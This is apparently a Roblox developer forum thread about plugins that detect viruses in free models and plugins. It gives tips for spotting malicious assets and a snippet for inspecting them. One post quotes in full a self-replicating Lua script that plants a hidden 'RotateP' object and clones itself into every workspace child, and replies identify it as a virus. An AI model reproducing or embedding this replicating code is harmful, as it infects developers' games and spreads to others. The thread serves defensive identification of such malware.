Thank you for this plugin, i should inform my friend about this because he puts free models and i found out it has a virus and my roblox studio got infected
Hi, didn’t make these plugins. Only sharing them and providing information about them, let me know if your friend got rid of the virus.
All of your games were infected definitely means you either put the same model which has a virus in the game or it’s because of a plugin. Uninstall or delete all plugins you don’t know of, and use these plugins. It’s a simple process and it can be really helpful. Good luck!
local Tbl = {}
for _, v in ipairs(game:GetObjects("rbxassetid://IDHERE")) do
table.insert(Tbl, v)
v.Parent = workspace
end
game:GetService("Selection"):Set(Tbl)
as it inserts all the assets and not only the first one.
If a plugin has more than one asset, then it’s generally safe to say it’s malicious. No plugin would have more than one asset parented to the plugin itself, it’s usually just a folder.
U can see virusses just by seeing a Fire script or some weird script with some random characters like the questionmark (?) Or something else, just a random name.
if script.Parent.className ~= "RotateP" then
local p = Instance.new("RotateP")
p.Parent = workspace
p.Name = "INfecTION"
script.Parent = p
end
function check()
local list = workspace:GetChildren()
for i = 1, #list do
if list[i]:findFirstChild("INfecTION") == nil and list[i].className ~= "RotateP" then
script.Parent:Clone().Parent = list[i]
end
wait()
end
end
while true do
check()
if workspace:findFirstChild("inFECtion") == nil then
local main = script.Parent:Clone()
main.Name = "inFECtion"
main.Parent = workspace
end
wait(3)
end
It’s quite literally a virus. It injects itself into every child of workspace. It clones its parent rather than itself; is there any other script which comes bundled with this?
RotateP and other Hidden Class viruses are often times lag generators OR are containers and/or gateways for other viruses, such as 4D Being, which is a container/gateway for Wildfire. My masterpost covers a few of these. They’ve become more common in recent months.